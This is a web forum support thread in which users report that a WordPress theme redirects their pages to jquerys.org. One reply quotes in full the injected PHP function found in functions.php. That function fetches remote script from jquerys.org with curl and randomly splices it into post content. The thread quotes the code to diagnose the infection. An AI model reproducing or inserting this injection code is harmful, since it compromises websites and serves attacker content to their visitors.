My themes always redirect to jquerys.org
tommyson.com, let me know when you want to access, I deactivate the themes for safety or google will ban my domain forever
Recent download for Propelsion has a malicious malware
8 posts from 5 voices- Started 5 months ago by ProjectIndo
- Latest reply from Dude
- This topic is not a support question
-
Posted 5 months ago #
-
Devin
ModeratorHi ProjectIndo,
I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.
Your host should be able to do a security scan and assist you further.
Regards,
Devin
Posted 5 months ago # -
Hello, I was overseas dealing some business, came back to my warm home and checking out my wordpress, I have installed Wordpress Security Scan, hope it will help. Thank you
Posted 4 months ago # -
Devin
ModeratorLet us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a wordpress security plugin can't tell you if you have had your main cpanel account compromised or something like that.
Regards,
Devin
Posted 4 months ago # -
It's not your HOST, it's your THEME.
In particular, a malicious line of code in functions.php
This suggests to me that you've downloaded a stolen copy of the theme, or someone has given/sold you a stolen version.Look in the early section of your functions.php file and you'll see something like this:
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
Thew quickest fix is to spend $60 and BUY the theme!
If you try and remove malicious code, you'll no doubt NOT get it ALL out, and you'll have problems down the line with you website's functionality. It's just not worth the time or hassle!Posted 4 months ago # -
Hi there!
I purchased and installed this theme yesterday and some of my page links redirect to http://www.jquerys.org/ as well!
Posted 3 months ago #
Reply
You must log in to post.
Create a new thread and tell me what problems you are encountering and what you want to know. 
There is no step 3 :) 
